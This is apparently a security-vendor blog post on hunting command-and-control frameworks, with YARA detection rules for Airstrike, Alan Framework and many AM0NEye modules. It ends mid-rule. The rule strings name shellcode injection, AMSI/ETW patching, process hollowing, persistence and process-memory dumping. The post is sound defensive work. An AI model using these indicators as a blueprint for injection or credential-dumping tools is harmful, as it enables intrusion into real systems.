Back

C2 Frameworks - Threat Hunting in Action with YARA Rules

Cyber Threat Intelligence

post-exploitation, yara, network defense, ttps, signatures

C2 Frameworks - Threat Hunting in Action with YARA Rules

Intro

C2 frameworks, also known as Command and Control frameworks, are software or systems used by cybercriminals to maintain control over compromised machines or networks. These frameworks provide a centralized platform for controlling multiple compromised systems within a target network and are used in real-world cyber attacks.

It's important to note that C2 frameworks are not inherently malicious. Ethical hackers and red teamers also use them to test network defenses. However, in the hands of bad actors, C2 frameworks can be used for malicious purposes. That may explain why frameworks like Cobalt Strike have generated so much interest from both sides—white hats and Dark Web actors—in the face of initial access brokers (IAB) misusing them.

Last year, Microsoft led an effort to stop cybercriminals from abusing security tools, including C2 frameworks. Microsoft’s Digital Crimes Unit (DCU) took technical and legal action to disrupt cracked, legacy copies of Cobalt Strike and to address the abuse of Microsoft software, which has been used by cybercriminals to distribute malware, including ransomware. This remarkable action could create a positive precedent in the cybercriminal ecosystem, which widely uses such tools for malicious purposes.

For educational purposes, Resecurity has developed sample YARA rules for various C2 frameworks to assist network defenders. This information may also be useful for red team specialists in planning potential evasion tactics when conducting vulnerability assessments and penetration testing (VAPT).

- Airstrike C2
- Alan Framework
- AM0NEye
- Atlas C2
- BruteRatel
- C3 (Custom Command and Control)
- Callidus
- DBC2
- Deimos C2
- GrimReaper C2
- FlyingAFalseFlag C2
- Mike C2
- Nimbo C2
- NorthStar C2
- Petaq C2
- Pickle C2
- Posh C2
- Reddit C2
- Sharp C2
- Trevor C2
- SQLC2

This material will open a new chapter in the future of threat hunting educational content from Resecurity, enabling network defenders to develop better detection practices. In fact, there are over 145 various C2 frameworks, each with different popularity in the eyes of threat actors. To learn more about them, we highly recommend researching the C2 Matrix project, kindly developed by Jorge Orchilles (SANS Principal Instructor, Author, and Red Team and Purple Team Ambassador), Bryson Bort (Founder of SCYTHE), and Adam Mashinchi (Principal Product Manager for Managed Detection and Response at Red Canary).

That’s why the provided content by Resecurity illustrates only a small part of the potential area of research. C2s are widely used by adversaries in the post-exploitation stage, where, in practice, the actor prefers to minimize any network communications as well as modules that could be detected by signatures. This tendency creates a real challenge for detection. Adversaries are well aware of both signature-based and behavior-based (fileless) methods of detection and continuously design new TTPs to bypass and evade them.

How Bad Actors Use C2 Frameworks

Malicious actors use C2 frameworks in several ways:

1. Maintaining control over compromised systems: Bad actors use C2 frameworks to maintain control over compromised systems for extended periods, allowing them to increase the potential for damage.

2. Performing post-exploitation tasks: C2 frameworks provide capabilities for performing post-exploitation tasks, such as maintaining access to systems and working collaboratively with others to achieve their objectives.

3. Using external hacking tools: C2 frameworks support the use of external post-exploitation hacking tools, allowing bad actors to tailor the framework to their needs using tools they are comfortable with.

4. Issuing instructions and downloading malicious payloads: Bad actors use C2 frameworks to issue instructions to compromised devices, download additional malicious payloads, and pipe stolen data back to themselves.

5. Customizing and evading detection: Adversaries can customize off-the-shelf C2 frameworks like Metasploit and Cobalt Strike to make detection more difficult. They can also use open-source frameworks like Sliver and Empire, which are gaining popularity among cybercriminals.

Overall, C2 frameworks provide a powerful toolset for bad actors to maintain control over compromised systems, perform post-exploitation tasks, and evade detection. Their functionality and flexibility make them attractive to both red teamers and malicious actors.

Threat Hunting

C2 frameworks are used by attackers to establish communication channels with compromised systems and issue commands to carry out malicious activities. Detecting C2 frameworks is crucial for identifying and mitigating cyber threats. Here are some techniques and indicators that can help in detecting C2 frameworks:

1. Network Traffic Analysis: C2 frameworks often rely on network communication to establish connections and exchange commands. Monitoring network traffic for suspicious patterns, unusual protocols, or unexpected connections can help in detecting C2 activity.

2. DNS Filtering: C2 frameworks may use domain names for communication. Implementing DNS filtering services can help prevent C2 callbacks to suspicious or newly registered domains.

3. Beacon Detection: C2 frameworks often use beacons, which are periodic signals sent by compromised devices to the C2 server. These beacons can be a tell-tale sign of C2 activity. Intrusion Detection/Prevention Systems (IDS/IPS) can be configured to detect beacons associated with known C2 frameworks.

4. Anomaly Detection: C2 frameworks may exhibit unusual behavior or patterns that deviate from normal network traffic. Employing anomaly detection techniques, such as machine learning algorithms or statistical analysis, can help identify C2 activity based on deviations from normal network behavior.

5. Payload Analysis: Analyzing the payload of network traffic or files can provide insights into the presence of C2 frameworks. Malware analysis tools and techniques can be used to identify C2-related indicators, such as specific command and control protocols or communication patterns.

6. Behavioral Analysis: C2 frameworks often exhibit specific behavioral patterns, such as specific command execution or data exfiltration techniques. Monitoring for these behavioral indicators can aid in detecting C2 activity.

7. Threat Intelligence: Staying updated with the latest information on known C2 frameworks, their techniques, and indicators of compromise (IOCs) can help in proactive detection. Leveraging threat intelligence feeds and security research can provide valuable insights.

It's important to note that C2 frameworks can be customized and evolve over time, making detection challenging. Implementing a multi-layered security approach that combines network monitoring, anomaly detection, and threat intelligence can enhance the detection capabilities and improve overall security posture.

YARA Rules

To assist network defenders, Resecurity has developed several YARA rules for the most popular C2 frameworks. These rules may be modified, improved, and tailored to specific solutions, allowing the application
of such rules or signatures to detect C2 activity.

- Airstrike C2

import "hash"
import "pe"

rule AirStrike {
   meta:
      description = "AirStrike - AirStrike-x64.exe, AirStrike-x86.exe"
      sha256_1 = "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9"
      sha256_2 = "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad"
   strings:
      $s1  = "[-] Copied shellcode to memory" fullword ascii
      $s2  = "[-] Received shellcode of size %d" fullword ascii
      $s3  = "username=%s&pid=%d&machine=%s&domain=%s&arch=%s&process=%s&version=%s" fullword ascii
      $s4  = "[+] Killing process" fullword ascii
      $s5  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s6  = "[-] Thread finished" fullword ascii
      $s7  = "[-] Created thread" fullword ascii
      $s8  = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" fullword ascii
      $s9  = "[-] Changed memory protection" fullword ascii
      $s10 = "[+] Request sent" fullword ascii
      $s11 = "[-] Received response of size %d" fullword ascii
      $s12 = "[+] Data: %s" fullword ascii
      $s13 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s14 = "X-Session-ID: %s" fullword ascii
      $s15 = "192.168.17.131" fullword ascii
      $s16 = ".rdata$voltmd" fullword ascii
      $s17 = "  </trustInfo>" fullword ascii
      $s18 = "[-] Allocated memory at %p" fullword ascii
      $s19 = "_get_initial_narrow_environment" fullword ascii
      $s20 = "_set_app_type" fullword ascii
   condition:
      hash.sha256(0, filesize) == "be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9" or
      hash.sha256(0, filesize) == "582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad" or
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("crypt32.dll", "CryptBinaryToStringW") and
      pe.imports("wininet.dll", "InternetConnectW") and
      (( uint16(0) == 0x5a4d and filesize < 40KB and (8 of them)) or (all of them))
}


- Alan Framework

import "hash"
import "pe"

rule AlanFramework {
   meta:
      description = "AlanFramework - wqjs_x64.exe, wqjs_x86.exe"
      sha256_1 = "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0"
      sha256_2 = "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03"
   strings:
      $s1  = "proxy: target property must be present in proxy ownKeys" fullword ascii
      $s2  = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s3  = "Storage error: %d - '%s'" fullword ascii
      $s4  = "proxy: inconsistent getOwnPropertyDescriptor" fullword ascii
      $s5  = "proxy: property not present in target were returned by non extensible proxy" fullword ascii
      $s6  = "new.target only allowed within functions" fullword ascii
      $s7  = "GetTempPath2W" fullword ascii
      $s8  = "expecting target" fullword ascii
      $s9  = "circular reference when looking for export '%s' in module '%s'" fullword ascii
      $s10 = "Failed to read file header" fullword ascii
      $s11 = "getOwnPropertyDescriptors" fullword ascii
      $s12 = "operator %s: no function defined" fullword ascii
      $s13 = "new.target" fullword ascii
      $s14 = "out of memory in regexp execution" fullword ascii
      $s15 = "getenviron" fullword ascii
      $s16 = "curl -s -i" fullword ascii
      $s17 = "Failed to write header to the disk" fullword ascii
      $s18 = "invalid import binding" fullword ascii
      $s19 = "invalid descriptor flags" fullword ascii
      $s20 = "RegExp exec method must return an object or null" fullword ascii
   condition:
      hash.sha256(0, filesize) == "68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0" or
      hash.sha256(0, filesize) == "f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03" or
      pe.imports("kernel32.dll", "CreateProcessW") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "RemoveDirectoryW") and
      pe.imports("crypt32.dll", "CryptStringToBinaryA") and
      (uint16(0) == 0x5a4d and filesize < 3000KB and (8 of them)) or (all of them)
}


- AM0NEye

import "hash"

rule AM0NEye_AmsiInject {
   meta:
      description = "AM0NEye - amsi-inject.o"
      sha256 = "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852"
   strings:
      $x1  = "Fail - Could not patch AMSI.AmsiOpenSession in remote process: PID:%d" fullword ascii
      $s2  = "Success - Patched AMSI.AmsiOpenSession in remote process: PID:%d" fullword ascii
      $s3  = "amsi.dll" fullword ascii
      $s4  = "Attempting to patch AMSI in remote process with PID: %d" fullword ascii
      $s5  = "__imp_KERNEL32$OpenProcess" fullword ascii
      $s6  = "__imp_KERNEL32$WriteProcessMemory" fullword ascii
      $s7  = "amsi-inject.c" fullword ascii
      $s8  = "__imp_KERNEL32$GetProcAddress" fullword ascii
      $s9  = "__imp_KERNEL32$CloseHandle" fullword ascii
      $s10 = "__imp_KERNEL32$LoadLibraryA" fullword ascii
      $s11 = "patchAmsiOpenSession" fullword ascii
      $s12 = "__imp_BeaconDataInt" fullword ascii
      $s13 = "AmsiOpenSession" fullword ascii
      $s14 = "GCC: (GNU) 10-win32 20220324" fullword ascii
      $s15 = "P@.xdata" fullword ascii
   condition:
      hash.sha256(0, filesize) == "c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852" or
      uint16(0) == 0x8664 and filesize < 5KB and
      1 of ($x*) and 4 of them
}

rule AM0NEye_EtwX86 {
   meta:
      description = "AM0NEye - etw.x86.o"
      sha256 = "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190"
   strings:
      $s1  = "__imp__KERNEL32$GetCurrentProcess@0" fullword ascii
      $s2  = "__imp__KERNEL32$ReadProcessMemory@20" fullword ascii
      $s3  = "ReadProcessMemory failed" fullword ascii
      $s4  = "__imp__KERNEL32$GetProcAddress@8" fullword ascii
      $s5  = "Failed to find function address" fullword ascii
      $s6  = "__imp__KERNEL32$LoadLibraryA@4" fullword ascii
      $s7  = "__imp__KERNEL32$VirtualProtect@16" fullword ascii
      $s8  = "__imp__BeaconDataExtract" fullword ascii
      $s9  = "__imp__MSVCRT$strcmp" fullword ascii
      $s10 = "__imp__BeaconPrintf" fullword ascii
      $s11 = "__imp__BeaconDataParse" fullword ascii
      $s12 = "Could not load library" fullword ascii
      $s13 = "__imp__MSVCRT$memcpy" fullword ascii
      $s14 = "Working with 32-bit." fullword ascii
      $s15 = "0`.data" fullword ascii
      $s16 = "GCC: (GNU) 10-win32 20220324" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190" or
      uint16(0) == 0x014c and filesize < 6KB and
      8 of them
}

rule AM0NEye_FindModule {
   meta:
      description = "AM0NEye - FindModule.o"
      sha256 = "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4"
   strings:
      $s1  = "ExecuteSimpleSystemCallBase_Epilogue" fullword ascii
      $s2  = "EnumerateProcessModules" fullword ascii
      $s3  = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" fullword ascii
      $s4  = "ExecuteSimpleSystemCallBase_Finished" fullword ascii
      $s5  = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" fullword ascii
      $s6  = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" fullword ascii
      $s7  = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" fullword ascii
      $s8  = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" fullword ascii
      $s9  = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" fullword ascii
      $s10 = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" fullword ascii
      $s11 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" fullword ascii
      $s12 = "ExecuteSimpleSystemCallBase" fullword ascii
      $s13 = "IsElevated" fullword ascii
      $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" fullword ascii
      $s15 = "    ProcessID:   %lu" fullword ascii
      $s16 = "    ProcessName: %wZ" fullword ascii
      $s17 = "GetCurrentPid" fullword ascii
      $s18 = "SeDebugPrivilege" fullword wide
      $s19 = "FindModule.c" fullword ascii
      $s20 = "__imp_MSVCRT$_wcsicmp" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4" or
      uint16(0) == 0x8664 and filesize < 20KB and
      8 of them
}

rule AM0NEye_FindProcHandle {
   meta:
      description = "AM0NEye - FindProcHandle.o"
      sha256 = "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa"
   strings:
      $s1  = "ExecuteSimpleSystemCallBase_Epilogue" fullword ascii
      $s2  = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" fullword ascii
      $s3  = "ExecuteSimpleSystemCallBase_Finished" fullword ascii
      $s4  = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" fullword ascii
      $s5  = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" fullword ascii
      $s6  = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" fullword ascii
      $s7  = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" fullword ascii
      $s8  = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" fullword ascii
      $s9  = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" fullword ascii
      $s10 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" fullword ascii
      $s11 = "ExecuteSimpleSystemCallBase" fullword ascii
      $s12 = "IsElevated" fullword ascii
      $s13 = "Failed to obtain ProcessId..." fullword ascii
      $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" fullword ascii
      $s15 = "    ProcessID:   %lu" fullword ascii
      $s16 = "    ProcessName: %ls" fullword ascii
      $s17 = "GetPid" fullword ascii
      $s18 = "Process" fullword wide
      $s19 = "SeDebugPrivilege" fullword wide
      $s20 = "__imp_MSVCRT$_wcsicmp" fullword ascii
   condition:
      hash.sha256(0, filesize) == "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa" or
      uint16(0) == 0x8664 and filesize < 20KB and
      8 of them
}

rule AM0NEye_GetDomainInfo {
   meta:
      description = "AM0NEye - GetDomainInfo.o"
      sha256 = "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86"
   strings:
      $s1 = "__imp_NETAPI32$DsGetDcNameA" fullword ascii
      $s2 = "Domain Controller Address: %s" fullword ascii
      $s3 = "Domain Controller: %s" fullword ascii
      $s4 = "Domain Forest Name: %s" fullword ascii
      $s5 = "__imp_NETAPI32$NetApiBufferFree" fullword ascii
      $s6 = "DC Site Name: %s" fullword ascii
      $s7 = "GCC: (GNU) 10-win32 20220324" fullword ascii
      $s8 = "P@.xdata" fullword ascii
   condition:
      hash.sha256(0, filesize) == "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86" or
      uint16(0) == 0x8664 and filesize < 2KB and
      all of them
}

rule AM0NEye_RegistryPersistence {
   meta:
      description = "AM0NEye - RegistryPersistence.o"
      sha256 = "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643"
   strings:
      $s1  = "__imp_ADVAPI32$RegOpenKeyExW" fullword ascii
      $s2  = "Failed to open key  " fullword ascii
      $s3  = "Key deleted in registry, persistence removed. " fullword ascii
      $s4  = "__imp_ADVAPI32$RegCloseKey" fullword ascii
      $s5  = "Unsuccessful in opening key  " fullword ascii
      $s6  = "__imp_ADVAPI32$RegDeleteKeyValueW" fullword ascii
      $s7  = "Key opened " fullword ascii
      $s8  = "Key changed in registry, persistence installed " fullword ascii
      $s9  = "Key not changed in registry " fullword ascii
      $s10 = "Key not deleted in registry " fullword ascii
      $s11 = "Update" fullword wide
      $s12 = "Install" fullword ascii
      $s13 = "__imp_MSVCRT$strcmp" fullword ascii
      $s14 = "__imp_ADVAPI32$RegSetValueExW" fullword ascii
      $s15 = "Please use either an Install or Remove argument." fullword ascii
      $s16 = "RemovePersistence" fullword ascii
      $s17 = "InstallPersistence" fullword ascii
      $s18 = "Remove" fullword ascii
      $s19 = "Cannot find key value in registry " fullword ascii
      $s20 = "Key location open successful " fullword ascii
   condition:
      hash.sha256(0, filesize) == "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643" or
      uint16(0) == 0x8664 and filesize < 8KB and
      8 of them
}

rule AM0NEye_cThreadHijack {
   meta:
      description = "AM0NEye - cThreadHijack.o"
      sha256 = "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40"
   strings:
      $x1  = "[+] Wrote Beacon shellcode to the remote process!" fullword ascii
      $x2  = "[+] Target process PID: %d" fullword ascii
      $s3  = "[+] Successfully pointed the target thread's RIP register to the shellcode!" fullword ascii
      $s4  = "[+] Found a thread in the target process! Thread ID: %d" fullword ascii
      $s5  = "[+] Size of shellcode: %d bytes" fullword ascii
      $s6  = "C:\\Users\\ANON\\Desktop\\cThreadHijack\\cThreadHijack.o" fullword ascii
      $s7  = "__imp_KERNEL32$OpenProcess" fullword ascii
      $s8  = "__imp_KERNEL32$WriteProcessMemory" fullword ascii
      $s9  = "Error! Unable to set the target thread's RIP register. Error: 0x%lx" fullword ascii
      $s10 = "Error! Unable to write shellcode to allocated buffer. Error: 0x%lx" fullword ascii
      $s11 = "Error! Unable to get the state of the target thread. Error: 0x%lx" fullword ascii
      $s12 = "Error! Unable to open a handle to the process. Error: 0x%lx" fullword ascii
      $s13 = "__imp_KERNEL32$GetLastError" fullword ascii
      $s14 = "[+] Resuming the thread! Please wait for the Beacon payload to execute. This could take some time..." fullword ascii
      $s15 = "__imp_KERNEL32$GetThreadContext" fullword ascii
      $s16 = "[+] Suspending the targeted thread..." fullword ascii
      $s17 = "[+] Virtual memory for CreateThread and NtContinue routines allocated at 0x%llx inside of the remote process!" fullword ascii
      $s18 = "Error! Unable to allocate memory in the remote process. Error: 0x%lx" fullword ascii
      $s19 = "Error! Unable to allocate memory within the remote process. Error: 0x%lx" fullword ascii
      $s20 = "__imp_KERNEL32$GetModuleHandleA" fullword ascii
   condition:
      hash.sha256(0, filesize) == "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40" or
      uint16(0) == 0x8664 and filesize < 20KB and
      1 of ($x*) and 4 of them
}

rule AM0NEye_UnhookX64 {
   meta:
      description = "AM0NEye - unhook.x64.o"
      sha256 = "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe"
   strings:
      $s1  = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x64.o" fullword ascii
      $s2  = "$pdata$GetProcessEnvironmentBlock" fullword ascii
      $s3  = "$unwind$GetProcessEnvironmentBlock" fullword ascii
      $s4  = "GetProcessEnvironmentBlock" fullword ascii
      $s5  = "__imp_KERNEL32$GetModuleHandleW" fullword ascii
      $s6  = "__imp_KERNEL32$CloseHandle" fullword ascii
      $s7  = "__imp_KERNEL32$VirtualProtect" fullword ascii
      $s8  = "$unwind$GetRedirectedName" fullword ascii
      $s9  = "$pdata$GetRedirectedName_V4" fullword ascii
      $s10 = "$unwind$GetRedirectedName_V6" fullword ascii
      $s11 = "IsBeaconDLL" fullword ascii
      $s12 = "__imp_KERNEL32$CreateFileW" fullword ascii
      $s13 = "$pdata$GetRedirectedName_V2" fullword ascii
      $s14 = "__imp_KERNEL32$UnmapViewOfFile" fullword ascii
      $s15 = "__imp_KERNEL32$LoadLibraryW" fullword ascii
      $s16 = "$pdata$IsBeaconDLL" fullword ascii
      $s17 = "$unwind$GetRedirectedName_V4" fullword ascii
      $s18 = "$unwind$CustomGetModuleHandleW" fullword ascii
      $s19 = "$pdata$GetRedirectedName_V6" fullword ascii
      $s20 = "$unwind$IsBeaconDLL" fullword ascii
   condition:
      hash.sha256(0, filesize) == "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe" or
      uint16(0) == 0x8664 and filesize < 40KB and
      8 of them
}

rule AM0NEye_CurlX64 {
   meta:
      description = "AM0NEye - curl.x64.o"
      sha256 = "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206"
   strings:
      $s1  = "User Agent: %s" fullword ascii
      $s2  = "__imp_KERNEL32$lstrlenA" fullword ascii
      $s3  = "__imp_WININET$HttpSendRequestA" fullword ascii
      $s4  = "__imp_WININET$InternetReadFile" fullword ascii
      $s5  = "sendHttpRequest" fullword ascii
      $s6  = "Retrieving HTTP Request info failed" fullword ascii
      $s7  = "__imp_WININET$HttpOpenRequestA" fullword ascii
      $s8  = "__imp_WININET$HttpQueryInfoA" fullword ascii
      $s9  = "%s %s:%i %s" fullword ascii
      $s10 = "Response Code: %s" fullword ascii
      $s11 = "__imp_BeaconDataInt" fullword ascii
      $s12 = "__imp_WININET$InternetConnectA" fullword ascii
      $s13 = "__imp_MSVCRT$strtok" fullword ascii
      $s14 = "__imp_MSVCRT$strcmp" fullword ascii
      $s15 = "entry.c" fullword ascii
      $s16 = "No response." fullword ascii
      $s17 = "__imp_WININET$InternetCloseHandle" fullword ascii
      $s18 = "__imp_WININET$InternetOpenA" fullword ascii
      $s19 = "P@.xdata" fullword ascii
      $s20 = "GCC: (GNU) 10-win32 20200525" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206" or
      uint16(0) == 0x8664 and filesize < 10KB and
      8 of them
}

rule AM0NEye_EtwX64 {
   meta:
      description = "AM0NEye - etw.x64.o"
      sha256 = "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be"
   strings:
      $s1  = "__imp_KERNEL32$GetCurrentProcess" fullword ascii
      $s2  = "__imp_KERNEL32$ReadProcessMemory" fullword ascii
      $s3  = "ReadProcessMemory failed" fullword ascii
      $s4  = "__imp_KERNEL32$GetProcAddress" fullword ascii
      $s5  = "Failed to find function address" fullword ascii
      $s6  = "__imp_KERNEL32$LoadLibraryA" fullword ascii
      $s7  = "__imp_KERNEL32$VirtualProtect" fullword ascii
      $s8  = "__imp_MSVCRT$strcmp" fullword ascii
      $s9  = "Could not load library" fullword ascii
      $s10 = "Working with 64-bit." fullword ascii
      $s11 = "__imp_MSVCRT$memcpy" fullword ascii
      $s12 = "P@.xdata" fullword ascii
      $s13 = "GCC: (GNU) 10-win32 20200525" fullword ascii
   condition:
      hash.sha256(0, filesize) == "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be" or
      uint16(0) == 0x8664 and filesize < 6KB and
      8 of them
}

rule AM0NEye_ProcessHollowingX64 {
   meta:
      description = "AM0NEye - process-hollowing.x64.o"
      sha256 = "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d"
   strings:
      $x1  = "[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!" fullword ascii
      $x2  = "[+] Success - Spawned process for %s at %d (PID)" fullword ascii
      $x3  = "[!] Failure - Could not queue APC for main thread of %d (PID) to shellcode address 0x%p" fullword ascii
      $x4  = "[+] Success - APC queued for main thread of %d (PID) to shellcode address 0x%p" fullword ascii
      $x5  = "[!] Failure - Could not create a process for %s using CreateProcessA()" fullword ascii
      $s6  = "[+] Success - Wrote %d bytes to memory in remote process %d (PID) at 0x%p" fullword ascii
      $s7  = "[!] Failure - Could not allocate memory to remote process %d (PID)" fullword ascii
      $s8  = "[+] Success - Allocated RE memory in remote process %d (PID) at: 0x%p" fullword ascii
      $s9  = "[!] Failure - Could not write payload to memory at 0x%p" fullword ascii
      $s10 = "__imp_KERNEL32$WriteProcessMemory" fullword ascii
      $s11 = "[!] Failure - Could not resume thread." fullword ascii
      $s12 = "__imp_KERNEL32$CreateProcessA" fullword ascii
      $s13 = "__imp_KERNEL32$ResumeThread" fullword ascii
      $s14 = "__imp_KERNEL32$QueueUserAPC" fullword ascii
      $s15 = "__imp_KERNEL32$VirtualAllocEx" fullword ascii
      $s16 = "__imp_MSVCRT$memset" fullword ascii
      $s17 = "__imp_BeaconDataLength" fullword ascii
      $s18 = "hollow.x64.c" fullword ascii
      $s19 = "P@.xdata" fullword ascii
      $s20 = "GCC: (GNU) 12 20220819" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d" or
      uint16(0) == 0x8664 and filesize < 10KB and
      1 of ($x*) and 4 of them
}

rule AM0NEye_SecinjectX64 {
   meta:
      description = "AM0NEye - secinject.x64.o"
      sha256 = "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd"
   strings:
      $s1  = "__imp_KERNEL32$GetCurrentProcess" fullword ascii
      $s2  = "__imp_KERNEL32$OpenProcess" fullword ascii
      $s3  = "[!] Error mapping remote process.  Aborting..." fullword ascii
      $s4  = "__imp_KERNEL32$CreateRemoteThread" fullword ascii
      $s5  = "secinject.c" fullword ascii
      $s6  = "[!] Error mapping local process  Aborting..." fullword ascii
      $s7  = "[!] Error unmapping view" fullword ascii
      $s8  = "__imp_NTDLL$NtUnmapViewOfSection" fullword ascii
      $s9  = "__imp_NTDLL$NtMapViewOfSection" fullword ascii
      $s10 = "__imp_NTDLL$NtClose" fullword ascii
      $s11 = "__imp_NTDLL$NtCreateSection" fullword ascii
      $s12 = "[!] Error closing handle" fullword ascii
      $s13 = "mycopy" fullword ascii
      $s14 = "mycmpi" fullword ascii
      $s15 = "__imp_BeaconDataInt" fullword ascii
      $s16 = "[!] Error creating RWX memory section  Aborting..." fullword ascii
      $s17 = "GCC: (GNU) 10-win32 20210110" fullword ascii
      $s18 = "0@.rdata" fullword ascii
   condition:
      hash.sha256(0, filesize) == "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd" or
      uint16(0) == 0x8664 and filesize < 8KB and
      8 of them
}

rule AM0NEye_SyscallsdumpX64 {
   meta:
      description = "AM0NEye - syscallsdump.x64.o"
      sha256 = "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd"
   strings:
      $s1  = "Dumping PID %d to file: %s" fullword ascii
      $s2  = "Failed to retrieve PID %d process handle." fullword ascii
      $s3  = "Failed to create dump file at %s" fullword ascii
      $s4  = "Failed to set debug privilege." fullword ascii
      $s5  = "Failed to create minidump." fullword ascii
      $s6  = "Unhooking - Initial ZwProtectVirtualMemory failed." fullword ascii
      $s7  = "Unhooking - ZwWriteVirtualMemory failed." fullword ascii
      $s8  = "Unhooking - Final ZwProtectVirtualMemory failed." fullword ascii
      $s9  = "__imp_DBGHELP$MiniDumpWriteDump" fullword ascii
      $s10 = "__imp_ADVAPI32$LookupPrivilegeValueW" fullword ascii
      $s11 = "Failed to unhook NtReadVirtualMemory." fullword ascii
      $s12 = "  [!] OS Version not supported." fullword ascii
      $s13 = "SW2_GetSyscallNumber" fullword ascii
      $s14 = "SeDebugPrivilege" fullword wide
      $s15 = "__imp_BeaconDataInt" fullword ascii
      $s16 = "entry.c" fullword ascii
      $s17 = "__imp_MSVCRT$_wcsicmp" fullword ascii
      $s18 = "__imp_MSVCRT$memset" fullword ascii
      $s19 = "UnhookFunction" fullword ascii
      $s20 = "__imp_MSVCRT$swprintf_s" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd" or
      uint16(0) == 0x8664 and filesize < 30KB and
      8 of them
}

rule AM0NEye_SyscallsinjectX64 {
   meta:
      description = "AM0NEye - syscallsinject.x64.o"
      sha256 = "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb"
   strings:
      $x1  = "Copying shellcode to remote process - FAILED! %08X" fullword ascii
      $x2  = "Executing thread in remote process - FAILED! %08X" fullword ascii
      $s3  = "Shellcode injection completed successfully!" fullword ascii
      $s4  = "Opening process - FAILED! %08X" fullword ascii
      $s5  = "InjectShellcode" fullword ascii
      $s6  = "SW2_GetSyscallNumber" fullword ascii
      $s7  = "__imp_BeaconDataInt" fullword ascii
      $s8  = "entry.c" fullword ascii
      $s9  = "__imp_BeaconDataLength" fullword ascii
      $s10 = "SW2_HashSyscall" fullword ascii
      $s11 = "GCC: (GNU) 10-win32 20200525" fullword ascii
      $s12 = "0@.rdata" fullword ascii
      $s13 = "f=Zwum" fullword ascii
      $s14 = "SW2_PopulateSyscallList" fullword ascii
      $s15 = "SW2_SyscallList" fullword ascii
   condition:
